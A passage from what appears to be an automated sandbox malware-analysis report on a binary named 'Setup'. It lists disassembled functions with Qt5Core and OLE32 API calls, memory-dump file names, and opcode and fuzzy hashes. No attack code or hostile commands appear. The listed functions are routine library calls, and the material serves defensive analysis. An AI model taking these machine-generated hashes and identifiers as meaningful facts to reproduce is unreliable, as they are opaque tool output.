                                                                                                                                                              • API String ID: 1742880359-2567322570
                                                                                                                                                              • Opcode ID: e09c7d8934324f2c313aecc06aff517460fdad77bb9b11fca39f6d873715fda5
                                                                                                                                                              • Instruction ID: fbe5ea017f1f10280d31caa20f90f34cd1ed451224338db5e34504d21da985f2
                                                                                                                                                              • Opcode Fuzzy Hash: e09c7d8934324f2c313aecc06aff517460fdad77bb9b11fca39f6d873715fda5
                                                                                                                                                              • Instruction Fuzzy Hash: 69217F62A0EA9686DB418F22E854178A761FF89FA5F444032DE5E07758EF3CE059CF10
                                                                                                                                                              Function 00007FFBA19E2B50 Relevance: 24.2, APIs: 16, Instructions: 221COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Mutex@@$String@@$??8@?unlock@Hash@@String@@0@$?lock@Data@@List$?begin@?end@Recursive
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 149806509-0
                                                                                                                                                              • Opcode ID: 95fbad68283a8b38f93b9751e882fe8ab0f2f1b31b0876fbd699108b119a0483
                                                                                                                                                              • Instruction ID: 8f8e8459b0864a04dec945516e6c5b64b4c152a1e4dcd44d3f9e852c5b046923
                                                                                                                                                              • Opcode Fuzzy Hash: 95fbad68283a8b38f93b9751e882fe8ab0f2f1b31b0876fbd699108b119a0483
                                                                                                                                                              • Instruction Fuzzy Hash: A99184B6A0A74682EB96CB66D00467837A5FB49F98F454535CE1E473D0DF3CE896CB00
                                                                                                                                                              Function 00007FFBA1A40DE0 Relevance: 24.2, APIs: 16, Instructions: 181timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E2A
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E89
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40E94
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320A8
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320CD
                                                                                                                                                                • Part of subcall function 00007FFBA1A32090: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40E39), ref: 00007FFBA1A320E4
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40EDE
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40EE9
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33458
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A3347D
                                                                                                                                                                • Part of subcall function 00007FFBA1A33440: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A40ED6), ref: 00007FFBA1A33494
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A40FEB
                                                                                                                                                              • ??0QByteArray@@QEAA@PEBDH@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41027
                                                                                                                                                              • ??4QDateTime@@QEAAAEAV0@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41038
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41043
                                                                                                                                                              • ??0QByteArray@@QEAA@$$QEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A4105C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A4106A
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000000,00007FFBA1A26D60,?,?,?,00007FFBA1A24B24), ref: 00007FFBA1A41075
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@ByteLogger@@Message$?data@?size@?warning@Category@@Char@@Enabled@H00@LoggingV0@@Warning$A@$$DateEmpty@Time@@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3753777177-0
                                                                                                                                                              • Opcode ID: 6905e1fa5dc4ab9566ffd9d2b0ee0d48bc9686f0e09545bc9dd55dff3b7bff5c
                                                                                                                                                              • Instruction ID: a98d742539c6df7f5143f609fccf0b62eb2b0b28c826f1bc49c6b029eee1a02e
                                                                                                                                                              • Opcode Fuzzy Hash: 6905e1fa5dc4ab9566ffd9d2b0ee0d48bc9686f0e09545bc9dd55dff3b7bff5c
                                                                                                                                                              • Instruction Fuzzy Hash: EE717FB9A0E64286EBE69B31E5542BA6360FF85B95F404036DEAE17755FF3CE004DE00
                                                                                                                                                              Function 00007FFBA1A3C050 Relevance: 24.1, APIs: 16, Instructions: 128COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?load@?utf16@E__@@Latin1Library@@String@@@SystemV0@@$malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1286571026-0
                                                                                                                                                              • Opcode ID: 613c3f1f83c2c067632b2d21a524dd1e1e212006e0d37841e1f6afc2d961a4d3
                                                                                                                                                              • Instruction ID: 08d488caa768e3dce139e5636407de8ccefbdd28b8f146691a497eb1a49f925c
                                                                                                                                                              • Opcode Fuzzy Hash: 613c3f1f83c2c067632b2d21a524dd1e1e212006e0d37841e1f6afc2d961a4d3
                                                                                                                                                              • Instruction Fuzzy Hash: E351936260EB9282EB82DB25E4543B97361FB44B94F458032DE6E47754FF3DE58ACB00
                                                                                                                                                              Function 00007FFBA197A110 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 198windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A1C4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A224
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A22E
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A250
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A267
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A271
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A27E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A28B
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2C8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2D2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2DC
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A3D4
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessManager: factory %p has returned an empty result set, xrefs: 00007FFBA197A25D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@List$?dispose@Data@1@@$Logger@@Message$?warning@Empty@
                                                                                                                                                              • String ID: QNetworkAccessManager: factory %p has returned an empty result set
                                                                                                                                                              • API String ID: 3703548387-3007181373
                                                                                                                                                              • Opcode ID: 2f35a67cd55d0b40c35c671da0a9ca92f5ed5094df75ef6480ff4b08c73bf154
                                                                                                                                                              • Instruction ID: 3debcd514fd42a5eab8694aadde6d20dff8325cb209c4405c209c610e26ab4b5
                                                                                                                                                              • Opcode Fuzzy Hash: 2f35a67cd55d0b40c35c671da0a9ca92f5ed5094df75ef6480ff4b08c73bf154
                                                                                                                                                              • Instruction Fuzzy Hash: 6591AE72B1AA5286EB968F35E9901FD2361FF44B98B8D4032DE0E47654EF3CE446CB10
                                                                                                                                                              Function 00007FFBA197E400 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 182COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QVariant@@QEAA@HPEBXI@Z.QT5CORE ref: 00007FFBA197E465
                                                                                                                                                              • ?setProperty@QObject@@QEAA_NPEBDAEBVQVariant@@@Z.QT5CORE ref: 00007FFBA197E479
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA197E483
                                                                                                                                                              • ??0QUrl@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA197E4A1
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA197E534
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE ref: 00007FFBA197E594
                                                                                                                                                              • ??1QUrl@@QEAA@XZ.QT5CORE ref: 00007FFBA197E5A7
                                                                                                                                                              • ?isLocalFile@QUrl@@QEBA_NXZ.QT5CORE ref: 00007FFBA197E60D
                                                                                                                                                              • ?host@QUrl@@QEBA?AVQString@@V?$QFlags@W4ComponentFormattingOption@QUrl@@@@@Z.QT5CORE ref: 00007FFBA197E630
                                                                                                                                                              • ??9QString@@QEBA_NVQLatin1String@@@Z.QT5CORE ref: 00007FFBA197E659
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197E69B
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?className@QMetaObject@@QEBAPEBDXZ.QT5CORE ref: 00007FFBA197DDB9
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA197DDC7
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?reserve@QByteArray@@QEAAXH@Z.QT5CORE ref: 00007FFBA197DDE7
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@PEBDH@Z.QT5CORE ref: 00007FFBA197DDFF
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE ref: 00007FFBA197DE0A
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@PEBD@Z.QT5CORE ref: 00007FFBA197DE16
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?append@QByteArray@@QEAAAEAV1@D@Z.QT5CORE ref: 00007FFBA197DE21
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA197DE59
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?hasRegisteredConverterFunction@QMetaType@@SA_NHH@Z.QT5CORE ref: 00007FFBA197DE6C
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ?registerConverterFunction@QMetaType@@SA_NPEBUAbstractConverterFunction@QtPrivate@@HH@Z.QT5CORE ref: 00007FFBA197DE8F
                                                                                                                                                                • Part of subcall function 00007FFBA197DD70: ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA197DEA0
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@Byte$Meta$?append@String@@Url@@$ConverterFunction@Type@@$?dispose@?registerData@1@@Data@@Flags@ListObject@@Variant@@$?class?has?host@?reserve@?setAbstractComponentFile@Flag@FormattingLatin1LocalName@NormalizedObject@@@Option@Private@@Property@RegisteredString@@@TypeType@Type@@@@Url@@@@@V0@@Variant@@@
                                                                                                                                                              • String ID: _q_networksession$localhost
                                                                                                                                                              • API String ID: 2736353128-2128069922
                                                                                                                                                              • Opcode ID: 91361be8990ffea3d8f5693e5fb37ddbd4e91f919c5f69e5b671e19e77b22e37
                                                                                                                                                              • Instruction ID: f75e7beb8594c33dbc73a1944988c4bbd10bcccf4b3b5be992e546e5b69b821c
                                                                                                                                                              • Opcode Fuzzy Hash: 91361be8990ffea3d8f5693e5fb37ddbd4e91f919c5f69e5b671e19e77b22e37
                                                                                                                                                              • Instruction Fuzzy Hash: 62815DB2A0AA1686EB92DF35D4502FC2761FF44BACF894032DE0E57655EF38E446CB50
                                                                                                                                                              Function 00007FFBA197A0F4 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 181windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A1C4
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A224
                                                                                                                                                              • ?isEmpty@QListData@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A22E
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A250
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A267
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A271
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A27E
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A28B
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2C8
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2D2
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A2DC
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FFBA19D50FD), ref: 00007FFBA197A3D4
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessManager: factory %p has returned an empty result set, xrefs: 00007FFBA197A25D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@List$?dispose@Data@1@@$Logger@@Message$?warning@Empty@
                                                                                                                                                              • String ID: QNetworkAccessManager: factory %p has returned an empty result set
                                                                                                                                                              • API String ID: 3703548387-3007181373
                                                                                                                                                              • Opcode ID: 23cfd44a31ecb08669171db8befbc8446d11013c9d39c87f1f374dce37c8de81
                                                                                                                                                              • Instruction ID: e36ff30363a6fa944057fa216c0baea6a6eee0b91893b6a98e582cdd05678183
                                                                                                                                                              • Opcode Fuzzy Hash: 23cfd44a31ecb08669171db8befbc8446d11013c9d39c87f1f374dce37c8de81
                                                                                                                                                              • Instruction Fuzzy Hash: 27716F72A1AA5286EB928F31D9501FC2761FF45B98B898032DE4E47755EF2CE446CB10
                                                                                                                                                              Function 00007FFBA1A00DD0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 109windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E0D
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E1D
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: CoCreateInstance.OLE32(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF200
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF218
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF241
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF252
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF262
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF280
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF28E
                                                                                                                                                                • Part of subcall function 00007FFBA19FF1A0: ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA19FF29C
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00DE8
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • CoInitialize.OLE32(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E41
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E59
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E7E
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E8C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00E9C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00EB7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00EC2
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1977C7F), ref: 00007FFBA1A00ECD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
